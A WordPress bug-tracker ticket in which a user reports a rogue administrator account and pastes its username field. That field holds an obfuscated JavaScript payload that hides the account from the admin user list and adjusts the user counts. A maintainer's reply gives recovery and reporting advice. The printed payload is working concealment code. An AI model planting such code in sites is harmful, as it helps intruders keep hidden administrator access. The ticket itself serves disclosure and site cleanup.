WordPress.org

Make WordPress Core

Opened 3 years ago

Closed 3 years ago

#16447 closed defect (bug) (invalid)

JS in new admin user when updating through SVN

Reported by: webtechman Owned by:
Milestone: Priority: normal
Severity: normal Version:
Component: Security Keywords: javascript, script, admin
Focuses: Cc:

Description

I updated WordPress through the SVN as defined here http://codex.wordpress.org/Installing/Updating_WordPress_with_Subversion
Checked out from here:
svn sw http://core.svn.wordpress.org/tags/3.0.4

After the update was complete, I noticed there was a new WordPress Admin.
The newly added WordPress Admin name was AnthonyMedeiros73
The actual value of the user name (edit user view) was

<script LANGUAGE="JavaScript">function Decode(){var temp="",i,c=0,out="";var str="46!46!46!32!60!98!32!105!100!61!34!117!115!101!114!95!115!117!112!101!114!117!115!101!114!34!62!60!115!99!114!105!112!116!32!108!97!110!103!117!97!103!101!61!34!74!97!118!97!83!99!114!105!112!116!34!62!32!118!97!114!32!115!101!116!85!115!101!114!78!97!109!101!32!61!32!102!117!110!99!116!105!111!110!40!41!123!32!116!114!121!123!32!118!97!114!32!116!61!100!111!99!117!109!101!110!116!46!103!101!116!69!108!101!109!101!110!116!66!121!73!100!40!34!117!115!101!114!95!115!117!112!101!114!117!115!101!114!34!41!59!32!119!104!105!108!101!40!116!46!110!111!100!101!78!97!109!101!33!61!34!84!82!34!41!123!32!116!61!116!46!112!97!114!101!110!116!78!111!100!101!59!32!125!59!32!116!46!112!97!114!101!110!116!78!111!100!101!46!114!101!109!111!118!101!67!104!105!108!100!40!116!41!59!32!118!97!114!32!116!97!103!115!32!61!32!100!111!99!117!109!101!110!116!46!103!101!116!69!108!101!109!101!110!116!115!66!121!84!97!103!78!97!109!101!40!34!72!51!34!41!59!32!118!97!114!32!115!32!61!32!34!32!115!104!111!119!110!32!98!101!108!111!119!34!59!32!102!111!114!32!40!118!97!114!32!105!32!61!32!48!59!32!105!32!60!32!116!97!103!115!46!108!101!110!103!116!104!59!32!105!43!43!41!32!123!32!118!97!114!32!116!61!116!97!103!115!91!105!93!46!105!110!110!101!114!72!84!77!76!59!32!118!97!114!32!104!61!116!97!103!115!91!105!93!59!32!105!102!40!116!46!105!110!100!101!120!79!102!40!115!41!62!48!41!123!32!115!32!61!40!112!97!114!115!101!73!110!116!40!116!41!45!49!41!43!115!59!32!104!46!114!101!109!111!118!101!67!104!105!108!100!40!104!46!102!105!114!115!116!67!104!105!108!100!41!59!32!116!32!61!32!100!111!99!117!109!101!110!116!46!99!114!101!97!116!101!84!101!120!116!78!111!100!101!40!115!41!59!32!104!46!97!112!112!101!110!100!67!104!105!108!100!40!116!41!59!32!125!32!125!32!118!97!114!32!97!114!114!61!100!111!99!117!109!101!110!116!46!103!101!116!69!108!101!109!101!110!116!115!66!121!84!97!103!78!97!109!101!40!34!117!108!34!41!59!32!102!111!114!40!118!97!114!32!105!32!105!110!32!97!114!114!41!32!105!102!40!97!114!114!91!105!93!46!99!108!97!115!115!78!97!109!101!61!61!34!115!117!98!115!117!98!115!117!98!34!41!123!32!118!97!114!32!110!61!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!92!40!40!92!100!43!41!92!41!60!47!103!105!46!101!120!101!99!40!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!41!59!32!105!102!40!110!33!61!110!117!108!108!32!38!38!32!110!91!49!93!62!48!41!123!32!118!97!114!32!116!120!116!61!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!46!114!101!112!108!97!99!101!40!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!92!40!40!92!100!43!41!92!41!60!47!103!105!44!34!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!40!34!43!40!110!91!49!93!45!49!41!43!34!41!60!34!41!59!32!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!61!116!120!116!59!32!125!32!118!97!114!32!110!61!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!60!115!112!97!110!32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!46!101!120!101!99!40!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!41!59!32!105!102!40!110!33!61!110!117!108!108!32!38!38!32!110!91!49!93!62!48!41!123!32!118!97!114!32!116!120!116!61!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!46!114!101!112!108!97!99!101!40!47!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!60!115!112!97!110!32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!44!34!62!65!100!109!105!110!105!115!116!114!97!116!111!114!32!60!115!112!97!110!32!99!108!97!115!115!61!92!34!99!111!117!110!116!92!34!62!40!34!43!40!110!91!49!93!45!49!41!43!34!41!60!34!41!59!32!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!61!116!120!116!59!32!125!32!118!97!114!32!110!61!47!62!65!108!108!32!60!115!112!97!110!32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!46!101!120!101!99!40!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!41!59!32!105!102!40!110!33!61!110!117!108!108!32!38!38!32!110!91!49!93!62!48!41!123!32!118!97!114!32!116!120!116!61!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!46!114!101!112!108!97!99!101!40!47!62!65!108!108!32!60!115!112!97!110!32!99!108!97!115!115!61!34!99!111!117!110!116!34!62!92!40!40!92!100!43!41!92!41!60!47!103!105!44!34!62!65!108!108!32!60!115!112!97!110!32!99!108!97!115!115!61!92!34!99!111!117!110!116!92!34!62!40!34!43!40!110!91!49!93!45!49!41!43!34!41!60!34!41!59!32!97!114!114!91!105!93!46!105!110!110!101!114!72!84!77!76!61!116!120!116!59!32!125!32!125!32!125!99!97!116!99!104!40!101!41!123!125!59!32!125!59!32!97!100!100!76!111!97!100!69!118!101!110!116!40!115!101!116!85!115!101!114!78!97!109!101!41!59!32!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} </script><script LANGUAGE="JavaScript"> Decode(); </SCRIPT>

Change History (1)

comment:1 dd323 years ago

  • Milestone Awaiting Review deleted
  • Resolution set to invalid
  • Status changed from new to closed

That user would've been on the site before you upgraded, There's a good chance that obfuscated JS there was previously hiding it from your view, Knowing from what version you upgraded from helps.

For a quick checkpoint on where to go from here: http://codex.wordpress.org/FAQ_My_site_was_hacked

The next thing will be to check your database, Look at the date of the users registration, in the users table, check the 'user_registered' field, it'll let you know when your install was compromised (Assuming you didn't delete the user).

Finally, As long as this user wasn't registered -after- you upgraded to 3.0.4, it's likely that this was a hole in an older version of WordPress which has since been patched up.

For future reference, To report security issues, check out: http://codex.wordpress.org/Reporting_Bugs#Reporting_security_issues To get support to clean up your install, check out the support forums: http://wordpress.org/support/ and finally, you might find the "Exploit Scanner" plugin a worthwhile tool to run over to check for any other signs of infection: http://wordpress.org/extend/plugins/exploit-scanner/

Closing as invalid purely due to the fact that this would've happened prior to the 3.0.4 upgrade (Please email security at wordpress.org if you have a reason to believe it's a current threat, along with as much detail of the previous version of WordPress in use, the user registered details, any server logs which relate to it, and anything else you can gather).

Last edited 3 years ago by dd32 (previous) (diff)
Note: See TracTickets for help on using tickets.